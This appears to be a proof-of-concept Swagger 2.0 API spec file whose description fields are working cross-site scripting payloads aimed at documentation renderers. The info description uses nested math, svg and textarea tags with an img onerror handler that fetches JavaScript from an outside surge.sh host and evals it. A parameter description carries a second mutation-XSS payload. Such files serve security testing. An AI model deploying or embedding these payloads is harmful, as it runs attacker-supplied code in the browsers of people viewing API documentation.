PoCs / 1.yaml
asbeabi's picture
Update 1.yaml
cf26315
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><img src=x onerror=aler()><a title='</textarea><img src onerror=fetch(`https://exuberant-ice.surge.sh/script.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1></mtext></math></p></div><div class="description"></div><h1>Visit www.evil.com for $$$</h1><img src="https://upload.wikimedia.org/wikipedia/commons/9/9a/Gull_portrait_ca_usa.jpg"></div></textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
version: production
basePath: /JSSResource/
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
'/accounts/groupid/{id}':
delete:
parameters:
- description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: deleteGroupById
summary: Deletes a group by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findGroupsById
summary: Finds groups by id